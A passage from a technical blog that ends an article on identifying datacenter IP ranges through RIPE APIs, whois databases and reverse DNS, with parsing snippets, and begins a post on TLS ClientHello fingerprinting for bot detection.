<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-1-description-of-the-aut-num-object">AUT-NUM Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-2-description-of-the-domain-object">DOMAIN Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-3-description-of-the-inet6num-object">INET6NUM Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-5-description-of-the-route-object">ROUTE Object</a></li>
<li><a href="https://www.ripe.net/manage-ips-and-asns/db/support/documentation/ripe-database-documentation/rpsl-object-types/4-2-descriptions-of-primary-objects/4-2-6-description-of-the-route6-object">ROUTE6 Object</a></li>
</ul>
<p>Another API lookup example:</p>
<div class="highlight"><pre><span></span><code>curl -H <span class="s1">'Accept: application/json'</span> <span class="s1">'https://rest.db.ripe.net/ripe/route/193.0.0.0%20-%20193.0.7.255?unfiltered'</span>
</code></pre></div>
<h3>Idea 3: RIPEstat API</h3>
<p>Another excellent resource from RIPE NCC is the <a href="https://stat.ripe.net/docs/01.getting-started/#getting-started-with-ripestat">RIPEstat API</a>.</p>
<p>What is RIPEstat?</p>
<blockquote>
<p>RIPEstat is a large-scale information service and the RIPE NCC’s open data platform. You can get essential information on IP address space and Autonomous System Numbers (ASNs) along with related statistics on specific hostnames and countries.</p>
</blockquote>
<p>Potential downsides: API calls are restricted, and there is no way to download the database. The data covers only RIPE NCC, not the other RIRs. From what I observed, the API also seems to be rather slow.</p>
<p>For the purpose of finding datacenter IP ranges, the following API endpoints are especially interesting:</p>
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/address-space-hierarchy.html">Address Space Hierarchy</a></h4>
<blockquote>
<p>This data call returns address space objects (inetnum or inet6num) from the RIPE Database related to the queried resource.</p>
</blockquote>
<p>Example:</p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/address-space-hierarchy/data.json?resource=193.47.99.0/24"</span>
<span class="o">{</span>
<span class="s2">"data_call_name"</span>: <span class="s2">"address-space-hierarchy"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"rir"</span>: <span class="s2">"ripe"</span>,
<span class="s2">"resource"</span>: <span class="s2">"193.47.99.0/24"</span>,
<span class="s2">"exact"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"inetnum"</span>: <span class="s2">"193.47.99.0 - 193.47.99.255"</span>,
<span class="s2">"netname"</span>: <span class="s2">"HETZNER-PORTABLE-PI"</span>,
<span class="s2">"country"</span>: <span class="s2">"DE"</span>,
<span class="s2">"org"</span>: <span class="s2">"ORG-HOA1-RIPE"</span>,
<span class="s2">"admin-c"</span>: <span class="s2">"HOAC1-RIPE"</span>,
<span class="s2">"tech-c"</span>: <span class="s2">"HOAC1-RIPE"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PI"</span>,
<span class="s2">"mnt-by"</span>: <span class="s2">"RIPE-NCC-END-MNTHOS-GUN"</span>,
<span class="s2">"mnt-domains"</span>: <span class="s2">"HOS-GUN"</span>,
<span class="s2">"mnt-routes"</span>: <span class="s2">"HOS-GUNMYLOC-MNT"</span>,
<span class="s2">"created"</span>: <span class="s2">"2005-07-07T15:27:12Z"</span>,
<span class="s2">"last-modified"</span>: <span class="s2">"2016-04-14T08:14:55Z"</span>,
<span class="s2">"source"</span>: <span class="s2">"RIPE"</span>
<span class="o">}</span>
<span class="o">]</span>,
<span class="s2">"more_specific"</span>: <span class="o">[]</span>,
<span class="s2">"query_time"</span>: <span class="s2">"2022-03-14T13:34:32"</span>,
<span class="s2">"parameters"</span>: <span class="o">{</span>
<span class="s2">"resource"</span>: <span class="s2">"193.47.99.0/24"</span>
<span class="o">}</span>
<span class="o">}</span>,
<span class="s2">"query_id"</span>: <span class="s2">"20220314133432-07794397-fd21-4a59-b335-af95bcab6d0d"</span>,
<span class="s2">"process_time"</span>: <span class="m">116</span>
<span class="o">}</span>
</code></pre></div>
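<p>The same call can be made from Node.js. The sketch below builds the request URL and extracts the fields that matter for datacenter detection. The helper names are assumptions, <code>lookupHierarchy</code> relies on the global <code>fetch</code> of recent Node.js versions and is only defined here, not called, and the sample body is an abridged copy of the response above.</p>

```javascript
const RIPESTAT_BASE = 'https://stat.ripe.net/data';

// Build a RIPEstat data call URL, e.g. for "address-space-hierarchy".
function ripestatUrl(dataCall, params) {
  const url = new URL(`${RIPESTAT_BASE}/${dataCall}/data.json`);
  for (const [key, value] of Object.entries(params)) {
    url.searchParams.set(key, value); // values are percent-encoded automatically
  }
  return url.toString();
}

// Keep only the fields of the exact matches that help to identify the owner.
function exactNetnames(body) {
  return (body.data.exact || []).map((o) => ({
    inetnum: o.inetnum,
    netname: o.netname,
    org: o.org,
    country: o.country,
  }));
}

// Network variant (assumes a Node.js version that ships a global fetch).
async function lookupHierarchy(resource) {
  const res = await fetch(ripestatUrl('address-space-hierarchy', { resource }));
  if (!res.ok) throw new Error(`RIPEstat returned HTTP ${res.status}`);
  return exactNetnames(await res.json());
}

// Abridged copy of the response shown above.
const hierarchyBody = {
  data: {
    rir: 'ripe',
    resource: '193.47.99.0/24',
    exact: [{
      inetnum: '193.47.99.0 - 193.47.99.255',
      netname: 'HETZNER-PORTABLE-PI',
      country: 'DE',
      org: 'ORG-HOA1-RIPE',
    }],
    more_specific: [],
  },
};

console.log(ripestatUrl('address-space-hierarchy', { resource: '193.47.99.0/24' }));
console.log(exactNetnames(hierarchyBody));
```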
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/address-space-usage.html">Address Space Usage</a></h4>
<blockquote>
<p>This data call shows the usage of a prefix or IP range according to the objects currently present in the RIPE database. The data returned lists the assignments and allocations covered by the queried resource as well statistics on the total numbers of IPs in the different categories.</p>
</blockquote>
<p>Example: </p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/address-space-usage/data.json?resource=95.216.0.0/16"</span>
<span class="o">{</span>
<span class="s2">"data_call_name"</span>: <span class="s2">"address-space-usage"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"query_time"</span>: <span class="s2">"2022-03-13T00:00:00"</span>,
<span class="s2">"resource"</span>: <span class="s2">"95.216.0.0/16"</span>,
<span class="s2">"assignments"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.0/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.64/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.128/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"address_range"</span>: <span class="s2">"95.216.0.192/26"</span>,
<span class="s2">"asn_name"</span>: <span class="s2">"HETZNER-hel1-dc2"</span>,
<span class="s2">"status"</span>: <span class="s2">"ASSIGNED PA"</span>,
<span class="s2">"parent_allocation"</span>: <span class="s2">"95.216.0.0/15"</span>
<span class="o">}</span>
<span class="c1"># snip</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
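<p>One way to use this response is to sum up how many addresses are assigned per name. This is a sketch under the assumption that every <code>address_range</code> is an IPv4 CIDR prefix, as in the excerpt above; entries in any other notation are counted as zero. The function names are made up.</p>

```javascript
// Number of addresses in an IPv4 CIDR block; 0 if the notation is not CIDR.
function cidrSize(cidr) {
  const bits = Number(cidr.split('/')[1]);
  return Number.isInteger(bits) && bits >= 0 && bits <= 32 ? 2 ** (32 - bits) : 0;
}

// Sum the assigned addresses per asn_name.
function addressesPerName(body) {
  const totals = new Map();
  for (const a of body.data.assignments) {
    totals.set(a.asn_name, (totals.get(a.asn_name) || 0) + cidrSize(a.address_range));
  }
  return totals;
}

// The four assignments from the excerpt above.
const usageBody = {
  data: {
    resource: '95.216.0.0/16',
    assignments: [
      { address_range: '95.216.0.0/26', asn_name: 'HETZNER-hel1-dc2', status: 'ASSIGNED PA' },
      { address_range: '95.216.0.64/26', asn_name: 'HETZNER-hel1-dc2', status: 'ASSIGNED PA' },
      { address_range: '95.216.0.128/26', asn_name: 'HETZNER-hel1-dc2', status: 'ASSIGNED PA' },
      { address_range: '95.216.0.192/26', asn_name: 'HETZNER-hel1-dc2', status: 'ASSIGNED PA' },
    ],
  },
};

console.log(addressesPerName(usageBody));
```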
<h4>Endpoint: <a href="https://stat.ripe.net/docs/02.data-api/announced-prefixes.html">Announced Prefixes</a></h4>
<blockquote>
<p>This data call returns all announced prefixes for a given ASN. The results can be restricted to a specific time period.</p>
</blockquote>
<p>Example: </p>
<div class="highlight"><pre><span></span><code>curl --location --request GET <span class="s2">"https://stat.ripe.net/data/announced-prefixes/data.json?resource=24940&starttime=2020-12-12T12:00"</span>
<span class="o">{</span>
<span class="s2">"messages"</span>: <span class="o">[</span>
<span class="o">[</span>
<span class="s2">"info"</span>,
<span class="s2">"Results exclude routes with very low visibility (less than 10 RIS full-feed peers seeing)."</span>
<span class="o">]</span>
<span class="o">]</span>,
<span class="s2">"version"</span>: <span class="s2">"1.2"</span>,
<span class="s2">"data_call_name"</span>: <span class="s2">"announced-prefixes"</span>,
<span class="s2">"data_call_status"</span>: <span class="s2">"supported - connecting to ursa"</span>,
<span class="s2">"cached"</span>: false,
<span class="s2">"data"</span>: <span class="o">{</span>
<span class="s2">"prefixes"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.209.124.0/22"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.171.224.0/22"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"185.228.8.0/23"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>,
<span class="o">{</span>
<span class="s2">"prefix"</span>: <span class="s2">"195.248.224.0/24"</span>,
<span class="s2">"timelines"</span>: <span class="o">[</span>
<span class="o">{</span>
<span class="s2">"starttime"</span>: <span class="s2">"2020-12-12T16:00:00"</span>,
<span class="s2">"endtime"</span>: <span class="s2">"2022-03-14T08:00:00"</span>
<span class="o">}</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="c1"># snip</span>
<span class="o">]</span>
<span class="o">}</span>
<span class="o">}</span>
</code></pre></div>
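<p>Once the prefixes are available, checking whether an IP address falls into one of them is straightforward. Below is a minimal sketch that works on a trimmed copy of the response above instead of calling the API. The helper names <code>announced_networks</code> and <code>is_announced</code> are made up for illustration.</p>

```python
import ipaddress

# Trimmed copy of the "data" part of the response shown above.
response = {
    "data": {
        "prefixes": [
            {"prefix": "185.209.124.0/22"},
            {"prefix": "185.171.224.0/22"},
            {"prefix": "185.228.8.0/23"},
            {"prefix": "195.248.224.0/24"},
        ]
    }
}


def announced_networks(resp):
    """Return the announced prefixes as ipaddress network objects."""
    return [ipaddress.ip_network(p["prefix"]) for p in resp["data"]["prefixes"]]


def is_announced(ip, networks):
    """True if ip lies inside any of the given networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


networks = announced_networks(response)
print(is_announced("185.228.9.17", networks))
print(is_announced("8.8.8.8", networks))
```

<p>A linear scan is fine for a handful of prefixes. For many ASNs, a sorted list or a prefix tree would probably be the better data structure.</p>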
<h3>Idea 4: ASN Lookups</h3>
<p>Some Regional Internet Registries publish lists of AS numbers and the associated companies.</p>
<p><a href="https://ftp.ripe.net/ripe/asnames/">Example ASN list for RIPE-NCC</a>.</p>
<p>Excerpt:</p>
<div class="highlight"><pre><span></span><code>[...]
24928 NORDEAPL-AS Nordea Bank Polska SA, PL
24929 NGCS IT arte Sp. z o.o., PL
24931 DEDIPOWER Pulsant Limited, GB
24933 MINXS-AS MILLENNIUMS.NET GmbH, DE
24935 ATE-AS AVENIR TELEMATIQUE SAS, FR
24936 RIM2000M-AS Plusinfo OOO, RU
24937 UNTN PJSC "Ukrtelecom", UA
24938 TELECITYREDBUS-IT TELECITYGROUP INTERNATIONAL LIMITED, GB
24939 IVV ivv Informationsverarbeitung fuer Versicherungen GmbH, DE
24940 HETZNER-AS Hetzner Online GmbH, DE
24941 -Reserved AS-, ZZ
24944 ARENA-AS Arena Bilgisayar San. ve Tic A.S, TR
24945 ASN-VNTP Telecommunication Company Vinteleport Ltd., UA
24947 OZ-IP-Transit Parsun Network Solutions PTY LTD, AU
24949 BTCML-AXA-AS AXA Technology Services UK Limited, GB
24950 SOFIASAT-AS Venus REIT OOD, BG
[...]
</code></pre></div>
<p>The idea is to look up well-known datacenter names in these ASN lists and then query a whois server for the matching AS number, for example:</p>
<div class="highlight"><pre><span></span><code><span class="nb">echo</span> <span class="s1">'AS24940'</span> <span class="p">|</span> nc whois.radb.net <span class="m">43</span>
</code></pre></div>
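<p>The search in the ASN list can be scripted. The following sketch assumes that every line has the shape <code>&lt;asn&gt; &lt;as-name&gt; &lt;description&gt;, &lt;country&gt;</code>, as in the excerpt above. The function names are hypothetical, and <code>whois_query</code> is only my Python equivalent of the <code>nc</code> command (it is defined but not called here).</p>

```python
import socket

EXCERPT = """\
24939 IVV ivv Informationsverarbeitung fuer Versicherungen GmbH, DE
24940 HETZNER-AS Hetzner Online GmbH, DE
24941 -Reserved AS-, ZZ
24944 ARENA-AS Arena Bilgisayar San. ve Tic A.S, TR
"""


def parse_asn_line(line):
    """Split '<asn> <as-name> <description>, <CC>' into its parts."""
    asn, _, rest = line.strip().partition(" ")
    body, _, country = rest.rpartition(", ")
    name, _, description = body.partition(" ")
    return {"asn": int(asn), "name": name,
            "description": description, "country": country}


def find_asns(text, needles):
    """Return the AS numbers whose name or description contains a needle."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_asn_line(line)
        haystack = (entry["name"] + " " + entry["description"]).lower()
        if any(needle.lower() in haystack for needle in needles):
            hits.append(entry["asn"])
    return hits


def whois_query(query, host="whois.radb.net", port=43):
    """Send one whois query and return the raw text response."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(query.encode() + b"\r\n")
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode(errors="replace")


print(find_asns(EXCERPT, ["hetzner"]))
```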
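<h3>Idea 5: Download whois databases from Regional Internet Registries (RIR)</h3>
<p>There are five regional internet registries. The list below also includes the Number Resource Organization (NRO), the body that coordinates them:</p>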
<ol>
<li>RIPE NCC (Established in 1992)</li>
<li>APNIC (Established in 1993)</li>
<li>ARIN (Established in 1997)</li>
<li>LACNIC (Established in 1999)</li>
<li>NRO (Established in 2003)</li>
<li>AFRINIC (Established in 2004)</li>
</ol>
<p>Almost all of them publish <code>whois</code> databases on their FTP servers.</p>
<p>The whois databases for the RIRs can be found here (<strong>Careful</strong>, some of those links download large files):</p>
<ul>
<li><a href="https://ftp.afrinic.net/pub/dbase/afrinic.db.gz">AFRINIC whois database</a></li>
<li><a href="https://ftp.apnic.net/apnic/whois/">APNIC whois database</a></li>
<li><a href="https://ftp.lacnic.net/lacnic/dbase/lacnic.db.gz">LACNIC whois database</a></li>
<li><a href="https://ftp.arin.net/pub/rr/arin.db.gz">ARIN whois database</a></li>
<li><a href="https://ftp.ripe.net/ripe/dbase/ripe.db.gz">RIPE-NCC whois database</a></li>
</ul>
<p>The <a href="https://ftp.ripe.net/ripe/dbase/ripe.db.gz">RIPE-NCC database</a> is quite large:</p>
<div class="highlight"><pre><span></span><code>curl -I https://ftp.ripe.net/ripe/dbase/ripe.db.gz
HTTP/1.1 <span class="m">200</span> OK
Date: Sun, <span class="m">13</span> Mar <span class="m">2022</span> <span class="m">21</span>:07:26 GMT
Server: Apache
Last-Modified: Sun, <span class="m">13</span> Mar <span class="m">2022</span> <span class="m">01</span>:57:42 GMT
ETag: <span class="s2">"16382ea0-5da0fe3b0d490"</span>
Accept-Ranges: bytes
Content-Length: <span class="m">372780704</span>
Content-Type: application/x-gzip
</code></pre></div>
<p>Uncompressed, the RIPE-NCC database is about 5.5 GB in size.</p>
<p>Whois databases (which are in fact simple text files) store information in records known as objects. These are blocks of text in a standard notation defined in the Routing Policy Specification Language (RPSL). An object has multiple fields, called attributes or keys, that each have a value. Below is an example of a route object: <a href="https://www.ripe.net/manage-ips-and-asns/db/support/querying-the-ripe-database">Source</a></p>
<div class="highlight"><pre><span></span><code>route: 5.9.0.0/16
descr: HETZNER-RZ-FKS-BLK5
origin: AS24940
mnt-by: HOS-GUN
created: 2012-04-26T10:30:12Z
last-modified: 2012-04-26T10:30:12Z
source: RIPE
remarks: ****************************
remarks: * THIS OBJECT IS MODIFIED
remarks: * Please note that all data that is generally regarded as personal
remarks: * data has been removed from this object.
remarks: * To view the original object, please query the RIPE Database at:
remarks: * http://www.ripe.net/whois
remarks: ****************************
</code></pre></div>
<p>Querying those whois databases is still by far the best data source for inferring whether an IP address belongs to a datacenter or not.</p>
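<p>Because the objects are plain <code>key: value</code> text, a small parser is enough to work with them. This is a minimal sketch, assuming that objects in the dump are separated by blank lines and that continuation lines start with whitespace or <code>+</code>. The second object in the sample is made up (documentation prefix and documentation AS number) to show the splitting.</p>

```python
from collections import defaultdict

SAMPLE = """\
route: 5.9.0.0/16
descr: HETZNER-RZ-FKS-BLK5
origin: AS24940
mnt-by: HOS-GUN
source: RIPE

route: 192.0.2.0/24
descr: EXAMPLE-NET (made-up object)
origin: AS64496
source: RIPE
"""


def parse_rpsl(text):
    """Yield one dict per object; each attribute maps to a list of values."""
    current = defaultdict(list)
    last_key = None
    for line in text.splitlines():
        if not line.strip():
            # A blank line closes the current object.
            if current:
                yield dict(current)
            current, last_key = defaultdict(list), None
        elif line[0] in "#%":
            continue  # comment lines
        elif line[0] in " \t+" and last_key:
            # Continuation of the previous attribute value.
            current[last_key][-1] += " " + line[1:].strip()
        else:
            key, _, value = line.partition(":")
            last_key = key.strip()
            current[last_key].append(value.strip())
    if current:
        yield dict(current)


def routes_by_origin(objects):
    """Map each origin AS to the list of route prefixes it originates."""
    result = defaultdict(list)
    for obj in objects:
        for origin in obj.get("origin", []):
            result[origin].extend(obj.get("route", []))
    return dict(result)


objects = list(parse_rpsl(SAMPLE))
print(routes_by_origin(objects))
```

<p>Values are kept as lists because attributes such as <code>remarks</code> can appear several times in one object.</p>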
<h3>Idea 6: Reverse DNS Lookups</h3>
<p>Reverse DNS lookups are another option. Sometimes a reverse DNS query for an IP address reveals that the address belongs to a datacenter. Obvious downside: DNS queries are slow!</p>
<div class="highlight"><pre><span></span><code>dig -x <span class="m">167</span>.99.241.135
<span class="p">;;</span> AUTHORITY SECTION:
<span class="m">241</span>.99.167.in-addr.arpa. <span class="m">1800</span> IN SOA ns1.digitalocean.com. hostmaster.241.99.167.in-addr.arpa. <span class="m">1647194251</span> <span class="m">10800</span> <span class="m">3600</span> <span class="m">604800</span> <span class="m">1800</span>
</code></pre></div>
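<p>A rough sketch of how this could look in code. Note that it uses the PTR hostname rather than the SOA record shown above, and that the suffix list is purely illustrative and not a vetted list of hosting providers. Caching the lookups softens the speed problem a little.</p>

```python
import socket
from functools import lru_cache

# Illustrative needles only; a real list has to be compiled by hand.
DATACENTER_SUFFIXES = ("digitalocean.com", "your-server.de", "amazonaws.com")


@lru_cache(maxsize=4096)
def reverse_lookup(ip):
    """Return the PTR hostname for ip, or None if the lookup fails."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def looks_like_datacenter(hostname):
    """True if hostname equals or ends with one of the known suffixes."""
    if not hostname:
        return False
    host = hostname.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in DATACENTER_SUFFIXES)


print(looks_like_datacenter("ns1.digitalocean.com."))
```

<p>Usage would be <code>looks_like_datacenter(reverse_lookup(ip))</code>. A missing PTR record proves nothing, so this can only ever be one signal among several.</p>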
<h2>Conclusion</h2>
<p>There are many different sources that are helpful when deciding whether an IP address belongs to a datacenter or not.</p>
<p>But the following steps are essential and most relevant:</p>
<ol>
<li>Self-published IP ranges from hosting providers need to be considered.</li>
<li>The downloadable whois databases from RIRs such as RIPE-NCC or ARIN can be searched.</li>
<li>Manual task: A list of datacenters and hosting providers needs to be compiled. With this list of datacenter needles, the whois databases from the RIRs can be searched/grepped.</li>
</ol>Fingerprinting TLS - Core differences between TLS 1.2 and TLS 1.32022-01-18T12:46:00+01:002022-02-02T18:35:00+01:00Nikolai Tschachertag:incolumitas.com,2022-01-18:/2022/01/18/fingerprinting-TLS/<p>In this blog post, I highlight the core differences between TLS 1.2 and TLS 1.3 and investigate how we can use several properties of the protocol to obtain fingerprinting entropy from TLS clients.</p><p><a
class="orange_button"
href="https://tls.incolumitas.com/fps">
Get your TLS Fingerprint here
</a></p>
<p>— </p>
<p><a
class="orange_button"
href="https://tls.incolumitas.com/stats">
View TLS Fingerprint Statistics
</a></p>
<h2>Goal of this Article</h2>
<p>The goal of this blog post is twofold:</p>
<ol>
<li>To gain a <strong>better understanding</strong> of the TLS 1.2 and TLS 1.3 protocol.</li>
<li>To find stable entropy sources in the TLS handshake in order to <strong>fingerprint TLS clients</strong>. A TLS fingerprint allows me to infer what kind of TLS client library or operating system a client is using.</li>
</ol>
<p>Correlating TLS handshake data with the advertised HTTP User-Agent gives us information to <strong>detect malicious bots</strong>. For example, many advanced bots use Linux operating systems but claim to be macOS or Windows devices in the HTTP User-Agent. If the OS inferred from the TLS fingerprint does not match the OS advertised in the User-Agent, this could be a sign that the client lies about its configuration.</p>
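<p>The mismatch check itself is simple once both sides are known. The sketch below assumes that some earlier step has already mapped the TLS fingerprint to an operating system name (the <code>tls_os</code> argument, which is hypothetical). The User-Agent parsing is deliberately crude.</p>

```python
def os_from_user_agent(user_agent):
    """Very rough OS detection from a User-Agent string."""
    ua = user_agent.lower()
    if "windows nt" in ua:
        return "Windows"
    if "android" in ua:  # must come before the generic Linux check
        return "Android"
    if "iphone" in ua or "ipad" in ua:  # must come before the macOS check
        return "iOS"
    if "mac os x" in ua:
        return "macOS"
    if "linux" in ua:
        return "Linux"
    return None


def is_suspicious(tls_os, user_agent):
    """True if both sides name an OS and the two disagree."""
    ua_os = os_from_user_agent(user_agent)
    return tls_os is not None and ua_os is not None and tls_os != ua_os


mac_ua = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36")
print(is_suspicious("Linux", mac_ua))
```

<p>Unknown values on either side are treated as "no verdict" instead of as a mismatch, which keeps false positives down.</p>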
<h2>Fingerprinting TLS - A new Tool</h2>
<p>In this section, I present a simple tool that extracts properties / entropy from the TLS handshake and forms a TLS fingerprint. Such a TLS fingerprint may be used to identify devices / TLS implementations. This tool will be able to collect statistical data and correlate the entropy with the <code>User-Agent</code> transmitted in HTTP headers. After this data collection process, I can answer questions such as:</p>
<ol>
<li>Does this TLS fingerprint belong to the operating system that is claimed by the User Agent?</li>
<li>How unique is the TLS fingerprint of the client in question?</li>
<li>Based on past observations and collected TLS client data, is this fingerprint a legit one?</li>
<li>To what TLS implementation does this fingerprint belong?</li>
</ol>
<p><strong>Live TLS Entropy Detection:</strong> This is your last seen TLS handshake data - Taken from the initial Client Hello handshake message:</p>
<pre style="overflow: auto;" id="tls_fp">
...loading (JavaScript required)
</pre>
<script>
fetch('https://tls.incolumitas.com/fps')
.then(response => response.json())
.then(function(data) {
document.getElementById('tls_fp').innerText = JSON.stringify(data, null, 2);
})
</script>
<p>Your User-Agent (<code>navigator.userAgent</code>) says that you are </p>
<pre style="overflow: auto;" id="userAgent">
</pre>
<script>
document.getElementById('userAgent').innerText = navigator.userAgent;
</script>
<h2>TLS Fingerprint Definition</h2>
<p>What fields/data from the TLS handshake constitute the TLS fingerprint? Put differently: What sources of entropy do I use to build the TLS fingerprint?</p>
<p>Currently, I use the following data sources from the initial client <code>ClientHello</code> TLS handshake message:</p>
<ul>
<li><strong>TLS Cipher Suites</strong> - The preference-ordered list of <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4">supported cipher suites</a> of the client. (Example: <code>"19018,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</code>)</li>
<li><strong>Client Hello Version</strong> - The supported TLS version (Example: <code>"TLS 1.2"</code>)</li>
<li><strong>EC Point Formats</strong> - The <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-9">EC point formats</a> the client supports (Example: <code>"0,1,2"</code>)</li>
<li><strong>Extensions</strong> - The list of <a href="https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml#tls-extensiontype-values-1">supported extensions</a> (Example: <code>"56026,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,31354"</code>)</li>
<li><strong>Record Version</strong> - The TLS record version, which is mostly <code>1.0</code> (Example: <code>"TLS 1.0"</code>)</li>
<li><strong>Signature Algorithms</strong> - The list of supported client <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-16">signature algorithms</a> (Example: <code>"1027,2052,1025,1283,2053,1281,2054,1537"</code>)</li>
<li><strong>Supported Groups</strong> - The list of the <a href="https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-8">supported groups</a> of the client (Example: <code>"56026,29,23,24"</code>)</li>
</ul>
<p>Some TLS clients will randomize some TLS parameters for each new handshake. This is a small problem, but not a substantial one. For example, my own laptop/browser sends the following <code>ClientHello</code> and a slightly different one in the next handshake:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"num_fingerprints"</span><span class="p">:</span><span class="w"> </span><span class="mi">10</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"sha3_384"</span><span class="p">:</span><span class="w"> </span><span class="s2">"a14851b3e6b9daa564f285c983ab929318875eeac94c56d02268bfb00ca37427e7d7d677140284f7aa4da36e0a8979de"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"timestamp"</span><span class="p">:</span><span class="w"> </span><span class="mf">1643713939.2002213</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"tls_fp"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ciphers"</span><span class="p">:</span><span class="w"> </span><span class="s2">"31354,4865,4866,4867,49195,49199,49196,49200,52393,52392,49171,49172,156,157,47,53"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"client_hello_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ec_point_formats"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"extensions"</span><span class="p">:</span><span class="w"> </span><span class="s2">"14906,0,23,65281,10,11,35,16,5,13,18,51,45,43,27,17513,10794"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"record_version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"TLS 1.0"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"signature_algorithms"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1027,2052,1025,1283,2053,1281,2054,1537"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"supported_groups"</span><span class="p">:</span><span class="w"> </span><span class="s2">"47802,29,23,24"</span><span class="w"></span>
<span class="w"> </span><span class="p">},</span><span class="w"></span>
